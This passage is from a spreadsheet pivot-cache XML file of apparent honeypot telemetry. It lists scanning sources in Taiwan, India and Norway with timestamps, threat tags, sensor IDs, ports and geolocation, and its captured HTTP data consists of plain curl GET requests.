AB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;45077&amp;&amp;23&amp;&amp;9100&amp;&amp;48384"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:c3f9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3526"/>
    <x v="3526"/>
    <s v="NA&amp;&amp;220-134-21-67.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T16:43:53"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-02T16:43:53"/>
    <n v="446"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;35392&amp;&amp;9100&amp;&amp;37507"/>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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:1543"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3527"/>
    <x v="3527"/>
    <s v="125-229-4-85.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T16:37:52"/>
    <d v="2024-04-11T16:07:00"/>
    <d v="2025-04-02T16:37:52"/>
    <n v="923"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;49284&amp;&amp;9100&amp;&amp;20763"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:455"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3528"/>
    <x v="3528"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T16:37:23"/>
    <d v="2025-04-02T16:35:50"/>
    <d v="2025-04-02T16:37:23"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Kota"/>
    <s v="Kota"/>
    <s v="1266049"/>
    <s v="NA"/>
    <s v="25.1825"/>
    <s v="75.8391"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="2009-05-11"/>
    <s v="ABTS-DSL-DEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ee3:9c44"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3529"/>
    <x v="3529"/>
    <s v="NA&amp;&amp;218-161-83-188.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T16:34:21"/>
    <d v="2023-09-05T20:26:00"/>
    <d v="2025-04-02T16:34:21"/>
    <n v="5523"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;20214&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;43678&amp;&amp;34445&amp;&amp;34451"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:53bc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3530"/>
    <x v="3530"/>
    <s v="59-126-180-239.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T16:27:25"/>
    <d v="2023-08-12T12:28:00"/>
    <d v="2025-04-02T16:27:25"/>
    <n v="9520"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;56354&amp;&amp;23&amp;&amp;9100&amp;&amp;60140"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:b4ef"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3531"/>
    <x v="3531"/>
    <s v="NA&amp;&amp;218-161-74-229.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T16:19:51"/>
    <d v="2024-12-15T02:00:54"/>
    <d v="2025-04-02T16:19:51"/>
    <n v="259"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:4ae5"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3532"/>
    <x v="3532"/>
    <s v="NA&amp;&amp;114-32-126-61.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T16:16:22"/>
    <d v="2023-08-21T11:26:08"/>
    <d v="2025-04-02T16:16:22"/>
    <n v="356"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H3&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;21808&amp;&amp;23&amp;&amp;55979&amp;&amp;29435&amp;&amp;56006&amp;&amp;80&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:7e3d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3533"/>
    <x v="3533"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T15:57:43"/>
    <d v="2025-04-02T15:55:27"/>
    <d v="2025-04-02T15:57:43"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="134319"/>
    <s v="Elyzium Technologies Pvt. Ltd."/>
    <s v="Elyzium Consulting"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:676a:c371"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3534"/>
    <x v="3534"/>
    <s v="NA&amp;&amp;205.81-167-10.customer.lyse.net"/>
    <x v="0"/>
    <d v="2025-04-02T15:51:27"/>
    <d v="2025-02-14T14:00:51"/>
    <d v="2025-04-02T15:51:27"/>
    <n v="72"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="11"/>
    <s v="Rogaland"/>
    <s v="Stavanger"/>
    <s v="Stavanger"/>
    <s v="3137115"/>
    <s v="4001"/>
    <s v="58.97"/>
    <s v="5.73311"/>
    <s v="29695"/>
    <s v="Lyse Tele AS"/>
    <s v="Altibox"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2005-01-04"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:51a7:acd"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3535"/>
    <x v="3535"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T15:41:39"/>
    <d v="2025-03-19T14:32:49"/>
    <d v="2025-04-02T15:41:39"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="RailTel Corporation"/>
    <s v="2015-11-04"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:671e:412d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3536"/>
    <x v="3536"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T15:38:06"/>
    <d v="2025-04-02T15:35:55"/>
    <d v="2025-04-02T15:38:06"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:f2ff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3537"/>
    <x v="3537"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T15:04:36"/>
    <d v="2025-04-02T12:26:17"/>
    <d v="2025-04-02T15:04:36"/>
    <n v="2"/>
